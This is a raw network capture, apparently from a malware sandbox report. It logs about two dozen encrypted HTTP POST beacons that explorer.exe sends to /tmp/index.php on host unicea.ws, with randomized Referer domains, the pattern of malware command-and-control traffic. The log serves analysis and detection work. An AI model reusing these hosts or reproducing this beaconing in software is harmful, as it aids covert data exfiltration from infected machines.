Oct 19, 2024 06:43:52.821947098 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://potyjbnxqkwihrq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: unicea.ws
Oct 19, 2024 06:43:52.823015928 CEST	345	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 33 d1 a9 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuH3WESSicQZVdlhrkFl"3M.</OZ!##O#C/S5(]4_MDPk!O3HlkX}UM$v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50020	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:54.417454004 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://twhmygynknwaynw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: unicea.ws
Oct 19, 2024 06:43:54.419017076 CEST	210	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 52 bb f0 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuURD\z"pP3T+Sd?yx^vNJVze[>EO\cIZ=%%Fl!qa:oZ?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50021	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:55.959076881 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vqovnajgvrg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: unicea.ws
Oct 19, 2024 06:43:55.959129095 CEST	116	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 5a a2 fc Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu;Zi2[E{eLPvd-C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50022	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:57.495244980 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iqalmqarlgoleo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: unicea.ws
Oct 19, 2024 06:43:57.495289087 CEST	188	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 4b b7 9c Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vusKl,Q_4T)qYXqn=D<~9Qj-d"d3HWd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:58.872142076 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://manlfvrucld.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: unicea.ws
Oct 19, 2024 06:43:58.872153044 CEST	205	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 33 d4 9d Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu}3kiH#AWW$3\VI2f2y=T[5N~59&vY_@apZ2p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:00.169258118 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bmtcjbsxoypbehg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 260 Host: unicea.ws
Oct 19, 2024 06:44:00.169302940 CEST	260	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 45 ec ec Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu]ExHsjUeL}^6k\|/3R\|xO^~&@nDjR-(+n=`\ dn8%].\O{rLVbsmwE\|l!/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:06.414633989 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hyntfrjgoodahxw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: unicea.ws
Oct 19, 2024 06:44:06.414633989 CEST	291	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 37 ec a0 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu7VE{GFUPz]zZ?&>#!3L_[R~7)2&=ohk%"m@UG37DWW@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:11.830302000 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pfdeyqiftydbxp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: unicea.ws
Oct 19, 2024 06:44:11.830326080 CEST	356	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 01 c5 b5 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vueIQFsSS+pH^u7V\|%]P:?: Lw @-i%VYg+7W4\D@.iXrjS?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:17.796960115 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oxhmmntuaoqjqw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: unicea.ws
Oct 19, 2024 06:44:17.796978951 CEST	126	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2a 00 a6 96 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu*QLY`_q7t~hm-P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:23.953608990 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jhatysyfpdjacrth.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: unicea.ws
Oct 19, 2024 06:44:23.953627110 CEST	335	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 19 c5 98 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu:\|U[%ZxUfh6;s9\|"[BH}}RmE2xvCS+\AUJ/4bML#}9xh7*^6,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50029	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:29.529582977 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ekrrlfpmfkagxhov.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 176 Host: unicea.ws
Oct 19, 2024 06:44:29.529627085 CEST	176	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 2f d8 a3 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuy/~"ZquyvD3.~hW_3XATB@b5 U]70-<O[m4b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50030	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:35.730554104 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mwurfcocxsehx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: unicea.ws
Oct 19, 2024 06:44:35.730586052 CEST	131	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 44 cb 8e Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuRDDpQeAz#?c(J?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50031	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:41.925421953 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qjdqfxwyvfh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: unicea.ws
Oct 19, 2024 06:44:41.925450087 CEST	165	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 5f a7 8c Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuc_W@\Xzdyaq!y0 (CUg<K^I5M8m((

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50032	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:47.595964909 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gwjmvpjprpa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: unicea.ws
Oct 19, 2024 06:44:47.596019030 CEST	190	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 0b c4 87 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuUize@m"[g wMX5nwk9G/p)E:wNe/&LsBgY:?n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50033	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:53.435223103 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hsokfaschfagb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: unicea.ws
Oct 19, 2024 06:44:53.435261965 CEST	254	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 01 c4 a7 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuD}C^}hj$Q(o{a<UJEG)*R1OsfZ1o\|=Hn,zmczpJ/Upat-4UfZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50034	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:44:58.973855972 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yfwhugqkygknlega.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: unicea.ws
Oct 19, 2024 06:44:58.973910093 CEST	137	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 15 c6 f0 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuBUxsi4rZAol +uP/;j2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50035	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:05.624799967 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://clwlueiouwtdjlp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 220 Host: unicea.ws
Oct 19, 2024 06:45:05.624835014 CEST	220	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 27 ce f9 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuK'VWF]d3('q3Q4<X-n:7F3P-R4c^7}}\|x[p'~=b,\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:11.779484987 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://komfkwumjafaljeh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: unicea.ws
Oct 19, 2024 06:45:11.779517889 CEST	331	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 0a c4 a7 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuMi`lc1R1bCE9`*b%)Zo1XV\HT7LJK_'r%C2^95~L`P4[lW&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50037	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:18.432126045 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gkcfyfujfvjeukc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: unicea.ws
Oct 19, 2024 06:45:18.432161093 CEST	178	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 06 eb fe Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vueXKXms_sBb)N^pQWG0;^)9n_A)~:^@F)v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:24.746797085 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dsuiipbvrtqiui.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: unicea.ws
Oct 19, 2024 06:45:24.746833086 CEST	117	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 0a ab e4 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu+yBX?,b*'c\|=q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50039	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:31.552082062 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cottwgkexhqi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 317 Host: unicea.ws
Oct 19, 2024 06:45:31.552139997 CEST	317	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 1f d3 e3 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu5+DUHw<1[x-7=7uo"W&PitFzlHOU{KBZ(DFD?C{pBD,lv/V<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50040	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:37.867525101 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tyhclxkbrciiuit.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: unicea.ws
Oct 19, 2024 06:45:37.867558002 CEST	359	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 57 e9 bf Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu}W_P{QtXquzwb+y{6"S!#QT*zQk{&T:}'.Z`36-/=![.nKeO$MA,}j]/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50041	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:43.996870041 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fdwyluiudrfobcvl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: unicea.ws
Oct 19, 2024 06:45:43.996893883 CEST	273	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 29 fe 93 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vur) ]M_(p~hpIZx}h9n8GYMuiVJ{wn3VCbB'-PtS^[AjcZQBtfB^,>{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	61684	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:50.869941950 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://shybhbwsshpkm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: unicea.ws
Oct 19, 2024 06:45:50.869941950 CEST	237	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 37 c6 ee Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vux7QM_:bK^t{n[IPRfQ=OK5;-3Al2WBm6e2 #+N?oWSC!*wL\ur

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	61685	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:45:57.441528082 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ejvcjodbems.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 154 Host: unicea.ws
Oct 19, 2024 06:45:57.441571951 CEST	154	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 23 d0 be Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuF#KPy@i$`\|[8>/G=E)_;MVDL\!Hx;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	61686	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:46:05.412533998 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oilnmucjwyntrxl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: unicea.ws
